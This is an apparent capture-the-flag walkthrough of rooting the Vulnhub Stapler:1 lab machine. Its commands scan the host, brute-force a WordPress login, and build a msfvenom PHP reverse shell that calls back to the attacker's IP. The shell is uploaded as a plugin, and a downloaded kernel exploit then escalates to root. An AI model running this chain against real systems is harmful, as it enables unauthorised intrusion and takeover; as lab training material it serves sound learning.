This is a walkthrough of how I gained root access to the Stapler:1 image from Vulnhub.com. This walkthrough is being provided for educational purposes only. All testing on this image was done in an isolated lab environment. Understand that using the tools in this walkthrough against a host without permission is against the law. Be smart folks, and enjoy the walkthrough.
Full NMAP Scan of host:
root@kali:~# nmap -p- -A 192.168.1.235
There are a lot of ports/services to enumerate here. After some time, my enumeration of port 12380 uncovered some interesting things.
Enumerating port 12380 using Nikto:
root@kali:~# nikto -h https://192.168.1.235:12380
Nikto scan found the robots.txt file and 2 entries within. Investigating these brings me to a WordPress page.
Using WPScan to to get version and plugin info:
root@kali:~# wpscan –url https://192.168.1.235:12380/blogblog/
WordPress version is 4.2.1. I didn’t find anything useful in regards to plugins or versions.
Using WPScan to enumerate users:
root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ –enumerate u
Using WPScan to brute force login (starting with john):
root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ –wordlist /usr/share/wordlists/rockyou.txt –username john
I am able to login to WordPress using the credentials john/incorrect. Now to create a reverse shell payload.
Creating reverse shell payload using Msfvenom:
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.234 LPORT=4444 -f raw > shell235.php
Uploading my .php reverse shell to the plugins page:
Browse to plugins –> add new –> upload plugins. Find the php shellcode and upload. In my case, the file is shell235.php.
After clicking install now the next page will ask for an FTP path and FTP credentials. You don’t have to do anything here, the file has been uploaded.
Verifying the .php file has been uploaded:
As you can see, my shell235.php is here. Now lets get our Metasploit handler ready to catch this shell.
Metasploit handler options:
Execute the reverse shell by clicking on shell235.php:
Catching low privilege shell:
As you can see from the screenshot, we are connected via the low privilege user www-data.
OS Enumeration provides the kernel and Linux flavor/version:
Searching the local Exploit DB for privilege escalation vulnerabilities:
root@kali:~# searchsploit linux kernel 4.4 Ubuntu 16
Identified a local privilege escalation exploit. EDB-ID 39772/CVE-2016-4557. POC code can be found/downloaded here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Transferred exploit code using WGET:
Running exploit code:
Exploit code worked!